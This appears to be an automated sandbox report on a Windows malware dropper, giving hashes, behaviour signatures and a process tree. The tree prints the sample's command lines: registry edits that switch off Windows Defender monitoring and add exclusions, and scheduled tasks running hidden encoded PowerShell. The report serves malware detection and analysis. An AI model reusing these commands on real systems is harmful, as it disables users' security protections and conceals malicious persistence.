Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05-11-2024 15:23

General

  • Target

    8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe

  • Size

    7.3MB

  • MD5

    83dbe0cb14f889e38fc0f8889842cf9d

  • SHA1

    ded313ca908136000fd9e5f623dcf0974e2b5f30

  • SHA256

    8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff

  • SHA512

    ad4bef13d8b816dc81b42e0a2983cedd8c1b66bb15ffff93d908dd8bb78621c2ec690c44dc01bffb3a378159c42c7552ebd27bdb889eb13351a85a26d61fbac6

  • SSDEEP

    196608:91O0G+ffRqHIxpuBM9lsB1veokOefmev7+RND:3OL+ffRqoxpAQi0POcmez+LD

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe
    "C:\Users\Admin\AppData\Local\Temp\8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2728
    • C:\Users\Admin\AppData\Local\Temp\7zSEFAC.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Users\Admin\AppData\Local\Temp\7zSF41F.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2816
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2716
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2592
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2672
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
              6⤵
                PID:1796
          • C:\Windows\SysWOW64\forfiles.exe
            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
            4⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2544
            • C:\Windows\SysWOW64\cmd.exe
              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2624
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2148
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2596
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /CREATE /TN "gPfyjMadL" /SC once /ST 14:39:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2088
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /run /I /tn "gPfyjMadL"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2888
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /DELETE /F /TN "gPfyjMadL"
            4⤵
              PID:3060
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 15:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\eWFUySd.exe\" q8 /site_id 525403 /S" /V1 /F
              4⤵
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2424
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {67106181-4368-4854-B33B-E863FABE5A12} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
        1⤵
          PID:2228
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2268
            • C:\Windows\system32\gpupdate.exe
              "C:\Windows\system32\gpupdate.exe" /force
              3⤵
                PID:2960
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1792
              • C:\Windows\system32\gpupdate.exe
                "C:\Windows\system32\gpupdate.exe" /force
                3⤵
                  PID:1300
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2700
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  3⤵
                    PID:2148
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2600
                  • C:\Windows\system32\gpupdate.exe
                    "C:\Windows\system32\gpupdate.exe" /force
                    3⤵
                      PID:2700
                • C:\Windows\system32\gpscript.exe
                  gpscript.exe /RefreshSystemParam
                  1⤵
                    PID:2896
                  • C:\Windows\system32\taskeng.exe
                    taskeng.exe {4E8887D5-EA6F-4BA0-9FC4-E97F9C357920} S-1-5-18:NT AUTHORITY\System:Service:
                    1⤵
                      PID:1928
                      • C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\eWFUySd.exe
                        C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\eWFUySd.exe q8 /site_id 525403 /S
                        2⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        PID:1356
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /CREATE /TN "gjmiNEwHd" /SC once /ST 06:03:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:2496
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /run /I /tn "gjmiNEwHd"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1648
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /DELETE /F /TN "gjmiNEwHd"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2272
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1888
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                            4⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:2064
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2436
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                            4⤵
                            • Modifies Windows Defender Real-time Protection settings
                            • System Location Discovery: System Language Discovery
                            PID:2456
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /CREATE /TN "gPHzAkDZB" /SC once /ST 04:47:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                          3⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:3040
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /run /I /tn "gPHzAkDZB"
                          3⤵
                            PID:1856
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /DELETE /F /TN "gPHzAkDZB"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2176
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:996
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                              4⤵
                              • Windows security bypass
                              • System Location Discovery: System Language Discovery
                              PID:2104
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                            3⤵
                              PID:2140
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                4⤵
                                • Windows security bypass
                                • System Location Discovery: System Language Discovery
                                PID:1608
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                              3⤵
                                PID:708
                                • C:\Windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                    PID:2896
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2952
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                      PID:2900
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C copy nul "C:\Windows\Temp\YSrBLfWUtIHnuviW\GOxewzDU\PhwlcspWuijIbpFS.wsf"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1180
                                  • C:\Windows\SysWOW64\wscript.exe
                                    wscript "C:\Windows\Temp\YSrBLfWUtIHnuviW\GOxewzDU\PhwlcspWuijIbpFS.wsf"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    • Modifies data under HKEY_USERS
                                    PID:2924
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:2776
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:2956
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:2224
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:2424
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:536
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:1764
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:280
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • Windows security bypass
                                      PID:2248
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:924
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:2112
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:2464
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:2572
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      PID:3016
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • Windows security bypass
                                      PID:2684
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:1788
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:2080
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1280
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:352
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:628
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:848
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1776
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1912
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                        PID:1544
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2932
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:804
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2432
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1484
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                          PID:1780
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2460
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1908
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2064
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:620
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "gYNhNnFMf" /SC once /ST 12:59:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3040
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "gYNhNnFMf"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2828
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /DELETE /F /TN "gYNhNnFMf"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2740
                                      • C:\Windows\SysWOW64\cmd.exe
